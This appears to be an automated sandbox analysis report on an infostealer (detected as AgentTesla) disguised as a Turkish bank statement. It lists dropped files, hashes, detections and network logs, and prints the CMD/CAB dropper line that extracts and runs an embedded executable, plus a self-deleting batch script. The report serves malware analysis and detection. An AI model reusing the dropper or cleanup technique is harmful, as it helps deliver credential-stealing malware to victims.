                                                                                                                  SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):18944
                                                                                                                  Entropy (8bit):5.742964649637377
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                  MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                  SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                  SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                  SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):410
                                                                                                                  Entropy (8bit):5.361827289088002
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                  MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                  SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                  SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                  SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):410
                                                                                                                  Entropy (8bit):5.361827289088002
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                  MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                  SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                  SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                  SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2232
                                                                                                                  Entropy (8bit):5.380285623575084
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:+WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMuge//MM0Uyus:+LHxvCsIcnSKRHmOugA1s
                                                                                                                  MD5:6BCA4D958C56F3AA2AD1B08D09E024BE
                                                                                                                  SHA1:3B3089EE55BBAC06860C3B0FA656268B2409630A
                                                                                                                  SHA-256:55B152600E01B1C79F985FA2CB0818CFEA077E7E655F4C5E34F794502C79BB52
                                                                                                                  SHA-512:F5825D054803A4505AD8A015F29D11717E571BBF7BB8EC9050AB8D08414992AE569AB4301D53FD9D71BC01B38674CF533D99EAEA8C6E9E53B036C29B63449BE1
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):250368
                                                                                                                  Entropy (8bit):5.008874766930935
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                                  MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                  SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                                  SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                                  SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                                  Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):231936
                                                                                                                  Entropy (8bit):5.039764014369673
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                  MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                  SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                  SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                  SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):164
                                                                                                                  Entropy (8bit):4.989991939967194
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRILKfBQty:hWKdbuoL923fJWAawDNe923fTh
                                                                                                                  MD5:CECC1C22C5DD7697F240A4DDC63994D4
                                                                                                                  SHA1:C34D230A037B7B427FABE8A0F7DA76A88BEEDECF
                                                                                                                  SHA-256:4B9DE5489A0CB246C0A7E8C0DC932A989732B68E26F66055B1C82B7487B07819
                                                                                                                  SHA-512:E1A6143DB3BBB55088D704FF49ED5E94C25A04CDA72233F1270F9663B937C5734CFBE7092EC4B2E8DC8B59230011C1B2D1084C0A9F8B2593F6E793271A6C3382
                                                                                                                  Malicious:false
                                                                                                                  Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD0BF.tmp.cmd" /f /q..
                                                                                                                  Process:C:\Windows\System32\extrac32.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1081856
                                                                                                                  Entropy (8bit):6.9272903664814445
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
                                                                                                                  MD5:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                                  SHA1:97340CA203A1207E492135D580C6860A724A227F
                                                                                                                  SHA-256:F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
                                                                                                                  SHA-512:6C217FA37CC4C655CDA0A2A491E49AC736E4940027178B3C7D6488D296923D40CC26A4D0142052B94B58491FA90F17AB3F4115CB0C75EFE09175E732D62DBBF5
                                                                                                                  Malicious:true
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...N......\G.......P....@.......................... ...................@..............................6%..............................0r..................................................................................text....&.......(.................. ..`.itext.......@.......,.............. ..`.data........P.......4..............@....bss.....6...p.......R...................idata..6%.......&...R..............@....tls....4............x...................rdata...............x..............@..@.reloc..0r.......t...z..............@..B.rsrc...............................@..@............. ......................@..@................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):231936
                                                                                                                  Entropy (8bit):5.039764014369673
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                  MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                  SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                  SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                  SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 12 13:28:18 2024, mtime=Tue Nov 12 13:28:18 2024, atime=Tue Nov 12 13:28:15 2024, length=231936, window=
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1794
                                                                                                                  Entropy (8bit):3.4937986884798073
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:8w7rHfm84Z7tO5UA1s4FSnplwO4ZTqlgxm:8QrHTAtO9G4+plwZTqlo
                                                                                                                  MD5:EF2F0B75F9EB315C97BB8D84174E89D4
                                                                                                                  SHA1:A63E357844EBF0B7463F54CEAFC076ADD7611056
                                                                                                                  SHA-256:1C77BDC34C3AF4A0805728233CCA51A5770D9F4E0CD080CD0CF03B6DC97EF2FF
                                                                                                                  SHA-512:84F68578B574D259B3E6FAEAFD73A0F7CF67D870260970896EE8A675F575BEACFC67E4447332BA17E58C640FE3C0647D10DE74E898C3E90C936DDA4945BE17F5
                                                                                                                  Malicious:false
                                                                                                                  Preview:L..................F.@.. ....G...5...o...5..7.t..5............................:..DG..Yr?.D..U..k0.&...&...... M..........5.......5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSllY.s....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....lY.s..Roaming.@......DWSllY.s....C.......................x.R.o.a.m.i.n.g.....T.1.....lY.s..ACCApi..>......lY.slY.s..............................A.C.C.A.p.i.....l.2.....lY.s .TROJAN~1.EXE..P......lY.slY.s....E......................@.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........,........C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................
                                                                                                                  Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12320
                                                                                                                  Entropy (8bit):7.985982422659667
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:v8hdcG5whIfxIpV0s5TKbpd6koBNUDMGZvy7tMF8gms+TjK3e8Zz/mkW0YngB29:k6CJp+TopaBNUwEq5MOgUjAzekengw
                                                                                                                  MD5:2E93D1F30644FC2BC4EFAC469215796D
                                                                                                                  SHA1:89522CCB8D27FF6C064D13569764D8BA7579A28B
                                                                                                                  SHA-256:A6F69B99BECB49EFD80018C22E391DCDD6317F3A7EF52C625A1BC24D05A3BBE7
                                                                                                                  SHA-512:E5BBF8239BA78EBF81C7269339A22841BB982E39548536EDC77825E1D055B74330F835011E0B94E5A50FD58023D86FE71A5BDD12DFF024EF306040CDCED82119
                                                                                                                  Malicious:false
                                                                                                                  Preview:...Po:..%'a....^......*.....Fh...CSb....(z.WN....{&.1%;.Om..%...L[>z\.i.x.%.|............A2..U.'9...z..9.....!_....|.K.c..9`.L...fH.=u.......J6Rk.Vj.m....-....{v3d..s8...Z.;....r.Y.@..y..a.........|H.q.....d=.........O.|....!....T..b....?......Ge.4M....a.,....n5..Z.x ..s|..a..I.mQ.......@.Z.....Kr9p.....k!.!.bp...KD.].4.0e......cl.. N.&.~.A..rt6.vR.\.(.....-.U.}3_.5.j.Z..q.%\0$._QX..>..$7-....o-.....o-.=J4.,.d...b.,9].L[.u...O.2.+.E[..aYC.9MT.....c.Y.0x.W.I......_.Xzw0..B......8..9C..3.c..../.(.....x...o......5 .......L..=0......H.....v..,|.CI.f..9N..W...n.....r.<..kE.:.{z...O.{<;...,N....pP.i.7..OOa01...9W.....?gj?l.....^....h22.."p..!...{Gd..-.'"....>D.+....L.H..g.x..a.:....[..m;.*.9......_I%%G.../..C...K..u..."....E8S.,;.A.....9.w...{.1..:.Z.0.z...Or.........0x.>.D.q.......;p..V...p..4.).8 ...a...-.w.......A.i......q-z.d A%.Qj....v.rx4..K.#e..NA".B.F..${.3..0.hs..f!aV.i...tZ4}=.2....b..P.[._J......|.Ah.\....C.....S.U.(..fME.a..+...G.q.\=}.
                                                                                                                  Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):593
                                                                                                                  Entropy (8bit):4.621315688583255
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:qx/xTzP1eSbZ7u0wxDDDDDDDDjCaY5xcVaYAaMaTB8NGNY:+/xTzdp7u0wQakxKaLat8N/
                                                                                                                  MD5:9EE9D5D006B87F5E5531CFF86C90D69A
                                                                                                                  SHA1:90A4E395AB49DB4CD5829546CAFBAF688AB57411
                                                                                                                  SHA-256:163EA04EB35ED1B8FCC1C2BC7BB8EBA73F99D268EE47F9E5AE5B00C8AA9D73B3
                                                                                                                  SHA-512:21194776CF3E60B0A5EE7A13E2EE64EF2480EB2DF24A94F94AB068E652FCE49FC88B30940F5BE85721305233755AF6BD627722079EB0EE18DF88486574D1CE13
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x108200 (1081856) (1 MB)....Total bytes written = 0x109000 (1085440) (1 MB).......Operation completed successfully in 0.125 seconds.....
                                                                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):66
                                                                                                                  Entropy (8bit):4.524640141725149
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                  MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                  SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                  SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                  SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                  File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 34 datablocks, 0 compression
                                                                                                                  Entropy (8bit):6.9269519267354
                                                                                                                  TrID:
                                                                                                                  • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                  File name:TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
                                                                                                                  File size:1'082'267 bytes
                                                                                                                  MD5:c3fd77ee6020a412a9ce44fe17c703dd
                                                                                                                  SHA1:9ce6674753ea01856b334a26068cb6df9cb07d0f
                                                                                                                  SHA256:19b0d0d3e3946758994d9260a1e11b794ab964ef0c8b5aa9c43a3dae7c2be495
                                                                                                                  SHA512:3fd24428d10098fb83dfb1c90f04a908530b7ff09578034739a81c0db3a091d9ac0c9403d329696f1c509a543bdd88dded3769fe310262dfbd4de82c7f1baa55
                                                                                                                  SSDEEP:24576:v9SO4uaLaLTcMeYyn6ZNl16gKTEUJoQ6L7zk:FKt6Y7KL
                                                                                                                  TLSH:8535AF7AF6744861E037A5398CCB67A6582DBF7C1928B4C226F65B7C2E3A350340BD53
                                                                                                                  File Content Preview:MSCF............u.......................".......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                                                                                                                  Icon Hash:9686878b929a9886
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-11-12T15:28:10.530955+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705198.252.105.91443TCP
                                                                                                                  2024-11-12T15:28:27.297167+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549708TCP
                                                                                                                  2024-11-12T15:28:58.958739+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.550629TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Nov 12, 2024 15:28:09.735985041 CET49704443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.736032963 CET44349704198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:09.736107111 CET49704443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.783866882 CET49704443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.783936024 CET44349704198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:09.783991098 CET49704443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.922028065 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.922100067 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:09.922164917 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.924387932 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:09.924407005 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.530869007 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.530955076 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.572737932 CET49705443192.168.2.5198.252.105.91
